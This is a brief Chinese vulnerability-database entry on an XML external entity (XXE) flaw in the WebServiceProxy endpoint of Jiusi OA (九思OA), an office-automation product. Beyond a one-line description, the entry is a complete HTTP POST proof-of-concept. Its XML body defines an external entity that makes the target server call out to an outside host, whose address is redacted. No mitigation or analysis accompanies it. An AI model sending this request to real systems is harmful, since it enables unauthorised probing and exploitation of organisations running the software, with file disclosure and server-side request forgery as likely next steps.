九思OA WebServiceProxy XXE漏洞

日期: 2023-12-29 18:32:10 | 影响软件: 九思OA | POC: 已公开

漏洞描述

九思OA XXE漏洞

PoC代码

POST /jsoa/WebServiceProxy HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 139
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE aaa [<!ENTITY name SYSTEM "http://[REDACTED]/i/b2e5a7/xm0w/9kfw/" >]><name>&name;</name>

相关漏洞推荐